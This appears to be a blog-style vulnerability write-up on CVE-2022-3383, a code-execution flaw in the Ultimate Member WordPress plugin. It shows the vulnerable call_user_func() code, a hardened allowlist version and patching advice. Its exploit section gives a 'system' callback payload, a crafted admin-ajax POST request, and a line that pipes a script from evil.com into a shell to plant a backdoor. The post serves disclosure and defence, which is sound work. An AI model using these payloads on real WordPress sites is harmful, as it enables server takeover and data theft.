If your website relies on WordPress plugins, it’s crucial to stay updated on security risks. Today, let’s talk about CVE-2022-3383, a vulnerability in the Ultimate Member plugin (<= 2.5.). This flaw lets attackers run code on your server if they’ve got admin access—a dangerous combination caused by an unsafe use of call_user_func(). Here’s how it works, why it’s dangerous, and how hackers can exploit it.

What is Ultimate Member?

Ultimate Member is a popular WordPress plugin for managing user profiles and memberships. With over 200,000 active installations, it’s a big target.

Access Required: Authenticated admin-level user

The issue exists in the get_option_value_from_callback() function, where user-supplied input is blindly fed into call_user_func(). That means attacker-controlled data becomes the function WordPress executes—opening the door to code execution.

Where’s the Flaw?

Let’s look at a simplified form of the vulnerable code in /includes/core/class-admin-settings.php:

// Vulnerable function
public static function get_option_value_from_callback( $callback, $option_name ) {
    // No sanitization or restriction!
    return call_user_func( $callback, $option_name );
}

Here, $callback can be user-supplied, so _any_ function name that reaches this line is what PHP ends up executing.
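For contrast, here is the same function with the callback taken from a fixed allowlist instead of from the request. This is an added illustration written for this post, not Ultimate Member's own code or its 2.5.1 patch; the class name, the two helper methods and the option-name pattern are assumptions.

```php
<?php
// Added hardening example, not the plugin's real fix.
// Assumption: option values are only ever computed by a small, known set of
// plugin-internal helpers, so the request may choose an identifier from an
// allowlist but never supply a raw function name to call_user_func().
final class Hardened_Settings {

    /** Allowed identifiers mapped to the static methods they may invoke. */
    private const OPTION_CALLBACKS = [
        'default_role' => 'default_role',
        'profile_slug' => 'profile_slug',
    ];

    public static function default_role( string $option_name ): string {
        return 'subscriber';
    }

    public static function profile_slug( string $option_name ): string {
        return 'user';
    }

    public static function get_option_value_from_callback( $callback, $option_name ) {
        // 1. Accept only a known identifier, never an arbitrary callable.
        if ( ! is_string( $callback ) || ! isset( self::OPTION_CALLBACKS[ $callback ] ) ) {
            throw new InvalidArgumentException( 'Unknown option callback' );
        }
        // 2. Constrain the option name to the characters a WP option key uses.
        if ( ! is_string( $option_name ) || ! preg_match( '/^[a-z0-9_]{1,64}$/', $option_name ) ) {
            throw new InvalidArgumentException( 'Invalid option name' );
        }
        // 3. The callable is built from the allowlist, not from the request.
        $method = self::OPTION_CALLBACKS[ $callback ];
        return call_user_func( [ self::class, $method ], $option_name );
    }
}

// Legitimate use: identifier resolves to an internal helper.
echo Hardened_Settings::get_option_value_from_callback( 'default_role', 'um_role' ), "\n";

// The payload from the post is rejected before anything is executed.
try {
    Hardened_Settings::get_option_value_from_callback( 'system', 'id' );
} catch ( InvalidArgumentException $e ) {
    echo 'Rejected: ', $e->getMessage(), "\n";
}
```

Logging the rejected identifier (rather than echoing it) gives a useful detection signal, since a legitimate settings page never submits a PHP function name as the callback.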

How is this function triggered?

Attackers can reach get_option_value_from_callback() through settings pages, AJAX, or other admin-level actions Ultimate Member provides.

Example Exploit

Important: Only admins can exploit this directly—so an attacker either needs to compromise an admin account or escalate privileges by other means.

Let’s suppose an attacker submits the following payload:

// Example malicious callback
$payload = 'system';
// Option name could be any command, depending on context
$option_name = 'id';

// This leads to:
call_user_func('system', 'id'); // Executes 'id' command on the server

The output of id (revealing server info) would be displayed/processed. Worse: an attacker could use system('curl http://evil.com/shell.sh | sh') to install a backdoor.

Here’s how you might craft a request using a tool like Burp Suite or with custom code:

POST /wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in...

action=get_option_value_from_callback
callback=system
option_name=ls

This AJAX request would ask WordPress to execute system("ls")—listing server files.

Why Is This Dangerous?

- RCE is as bad as it gets: Attackers could install malware, create admin users, read site data, or destroy it.
- Most plugins assume admins are honest, but privilege-escalation bugs often pave the way for attackers to become admin.

What Should You Do?

- Patch ASAP! Upgrade Ultimate Member to at least version 2.5.1.

References & Further Reading

- CVE-2022-3383 on NVD
- WPScan Advisory
- Ultimate Member Changelog

Conclusion

The CVE-2022-3383 vulnerability in Ultimate Member underscores why developers must never trust user input—especially when calling powerful PHP functions like call_user_func() or eval(). Always validate, sanitize, and keep your plugins up to date.

If you manage a WordPress site, check your Ultimate Member version right now and patch it if you’re affected. Better safe than sorry.

Stay Safe!
If you want more insights on WordPress security, keep following for updates and deep-dives.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 20:14:00 UTC